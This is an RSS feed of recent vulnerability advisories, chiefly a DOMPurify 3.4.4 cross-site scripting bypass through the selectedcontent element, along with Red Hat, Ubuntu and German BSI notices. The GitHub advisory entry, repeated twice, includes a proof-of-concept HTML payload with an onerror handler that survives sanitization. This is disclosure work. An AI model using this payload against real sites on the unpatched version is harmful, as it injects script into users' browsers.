<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 06:57:53 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-338257</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-338257</link>
      <description>EUVD-2026-338257</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-338257</guid>
    </item>
    <item>
      <title>fkie_cve-2026-47423</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-47423</link>
      <description>&lt;p&gt;DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. In 3.4.4, DOMPurify allowed selectedcontent by default, allowing browsers to re-clone an XSS payload after sanitization so that unsanitized markup inside &amp;lt;selectedcontent&amp;gt; is returned. This issue is fixed in version 3.4.5.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. In 3.4.4, DOMPurify allowed selectedcontent by default, allowing browsers to re-clone an XSS payload after sanitization so that unsanitized markup inside &amp;lt;selectedcontent&amp;gt; is returned. This issue is fixed in version 3.4.5.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-47423</guid>
    </item>
    <item>
      <title>GHSA-87xg-pxx2-7hvx — DOMPurify XSS via selectedcontent re-clone</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-87xg-pxx2-7hvx</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: dompurify&lt;/p&gt;
&lt;p&gt;### Summary
DOMPurify 3.4.4 allows `selectedcontent` by default, allowing a chain in which browsers &amp;#34;re-clone&amp;#34; an XSS payload after sanitization, effectively bypassing DOMPurify.&lt;/p&gt;
&lt;p&gt;### Details
The chain is as follows:
1. The browser parses the input and creates a `&amp;lt;selectedcontent&amp;gt;` clone from the selected `&amp;lt;option&amp;gt;`
2. DOMPurify walks and sanitizes that generated clone.
3. DOMPurify reaches the original `&amp;lt;option&amp;gt;` and removes `selected=javascript:1`
4. The browser refreshes the `&amp;lt;selectedcontent&amp;gt;` clone from the original `option`&amp;#39;s content.
5. The refreshed clone is in a subtree DOMPurify already walked, which DOMPurify doesn&amp;#39;t go back to sanitize
6. The returned string contains unsanitized markup inside `&amp;lt;selectedcontent&amp;gt;`.&lt;/p&gt;
&lt;p&gt;### PoC
```js
const dirty =
  &amp;#39;&amp;lt;select&amp;gt;&amp;lt;button&amp;gt;&amp;lt;selectedcontent&amp;gt;&amp;lt;/selectedcontent&amp;gt;&amp;lt;/button&amp;gt;&amp;#39; +
  &amp;#39;&amp;lt;option selected=javascript:1&amp;gt;&amp;#39; +
  &amp;#39;&amp;lt;img src=x onerror=alert(1)&amp;gt;x&amp;#39; +
  &amp;#39;&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt;&amp;#39;;&lt;/p&gt;
&lt;p&gt;const clean = DOMPurify.sanitize(dirty);
console.log(clean);&lt;/p&gt;
&lt;p&gt;document.body.innerHTML = clean;
```&lt;/p&gt;
&lt;p&gt;Observed &amp;#34;sanitized&amp;#34; output in Chromium 148/WebKit 625:
```html
&amp;lt;select&amp;gt;&amp;lt;button&amp;gt;&amp;lt;selectedcontent&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34; onerror=&amp;#34;alert(1)&amp;#34;&amp;gt;x&amp;lt;/selectedcontent&amp;gt;&amp;lt;/button&amp;gt;&amp;lt;option&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34;&amp;gt;x&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt;
```&lt;/p&gt;
&lt;p&gt;After reinsertion, the browser updates the live DOM and strips the handler from the displayed clone, but the `onerror` has already fired:
```html
&amp;lt;select&amp;gt;&amp;lt;button&amp;gt;&amp;lt;selectedcontent&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34;&amp;gt;x&amp;lt;/selectedcontent&amp;gt;&amp;lt;/button&amp;gt;&amp;lt;option&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34;&amp;gt;x&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt;
```…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: dompurify&lt;/p&gt;
&lt;p&gt;### Summary
DOMPurify 3.4.4 allows `selectedcontent` by default, allowing a chain in which browsers &amp;#34;re-clone&amp;#34; an XSS payload after sanitization, effectively bypassing DOMPurify.&lt;/p&gt;
&lt;p&gt;### Details
The chain is as follows:
1. The browser parses the input and creates a `&amp;lt;selectedcontent&amp;gt;` clone from the selected `&amp;lt;option&amp;gt;`
2. DOMPurify walks and sanitizes that generated clone.
3. DOMPurify reaches the original `&amp;lt;option&amp;gt;` and removes `selected=javascript:1`
4. The browser refreshes the `&amp;lt;selectedcontent&amp;gt;` clone from the original `option`&amp;#39;s content.
5. The refreshed clone is in a subtree DOMPurify already walked, which DOMPurify doesn&amp;#39;t go back to sanitize
6. The returned string contains unsanitized markup inside `&amp;lt;selectedcontent&amp;gt;`.&lt;/p&gt;
&lt;p&gt;### PoC
```js
const dirty =
  &amp;#39;&amp;lt;select&amp;gt;&amp;lt;button&amp;gt;&amp;lt;selectedcontent&amp;gt;&amp;lt;/selectedcontent&amp;gt;&amp;lt;/button&amp;gt;&amp;#39; +
  &amp;#39;&amp;lt;option selected=javascript:1&amp;gt;&amp;#39; +
  &amp;#39;&amp;lt;img src=x onerror=alert(1)&amp;gt;x&amp;#39; +
  &amp;#39;&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt;&amp;#39;;&lt;/p&gt;
&lt;p&gt;const clean = DOMPurify.sanitize(dirty);
console.log(clean);&lt;/p&gt;
&lt;p&gt;document.body.innerHTML = clean;
```&lt;/p&gt;
&lt;p&gt;Observed &amp;#34;sanitized&amp;#34; output in Chromium 148/WebKit 625:
```html
&amp;lt;select&amp;gt;&amp;lt;button&amp;gt;&amp;lt;selectedcontent&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34; onerror=&amp;#34;alert(1)&amp;#34;&amp;gt;x&amp;lt;/selectedcontent&amp;gt;&amp;lt;/button&amp;gt;&amp;lt;option&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34;&amp;gt;x&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt;
```&lt;/p&gt;
&lt;p&gt;After reinsertion, the browser updates the live DOM and strips the handler from the displayed clone, but the `onerror` has already fired:
```html
&amp;lt;select&amp;gt;&amp;lt;button&amp;gt;&amp;lt;selectedcontent&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34;&amp;gt;x&amp;lt;/selectedcontent&amp;gt;&amp;lt;/button&amp;gt;&amp;lt;option&amp;gt;&amp;lt;img src=&amp;#34;x&amp;#34;&amp;gt;x&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt;
```…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-87xg-pxx2-7hvx</guid>
    </item>
    <item>
      <title>RHSA-2026:10999 — Red Hat Security Advisory: Red Hat Hardened Images RPMs bug fix and enhancement update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2026:10999</link>
      <description>&lt;p&gt;nix: coroutine stack-to-heap overflow via unbounded recursion in NAR directory parser nix: absolute path traversal when unpacking archives to disk dompurify: DOMPurify: Cross-site scripting vulnerability allows information disclosure&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;nix: coroutine stack-to-heap overflow via unbounded recursion in NAR directory parser nix: absolute path traversal when unpacking archives to disk dompurify: DOMPurify: Cross-site scripting vulnerability allows information disclosure&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2026:10999</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2026-47423</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-47423</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: dompurify.js, Ubuntu:18.04:LTS: dompurify.js, Ubuntu:22.04:LTS: node-dompurify, Ubuntu:24.04:LTS: node-dompurify, Ubuntu:26.04:LTS: node-dompurify&lt;/p&gt;
&lt;p&gt;DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. In 3.4.4, DOMPurify allowed selectedcontent by default, allowing browsers to re-clone an XSS payload after sanitization so that unsanitized markup inside &amp;lt;selectedcontent&amp;gt; is returned. This issue is fixed in version 3.4.5.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: dompurify.js, Ubuntu:18.04:LTS: dompurify.js, Ubuntu:22.04:LTS: node-dompurify, Ubuntu:24.04:LTS: node-dompurify, Ubuntu:26.04:LTS: node-dompurify&lt;/p&gt;
&lt;p&gt;DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. In 3.4.4, DOMPurify allowed selectedcontent by default, allowing browsers to re-clone an XSS payload after sanitization so that unsanitized markup inside &amp;lt;selectedcontent&amp;gt; is returned. This issue is fixed in version 3.4.5.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-47423</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-2910 — IBM App Connect Enterprise: Schwachstelle ermöglicht Cross-Site Scripting</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2910</link>
      <description>&lt;p&gt;Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2910</guid>
    </item>
  </channel>
</rss>
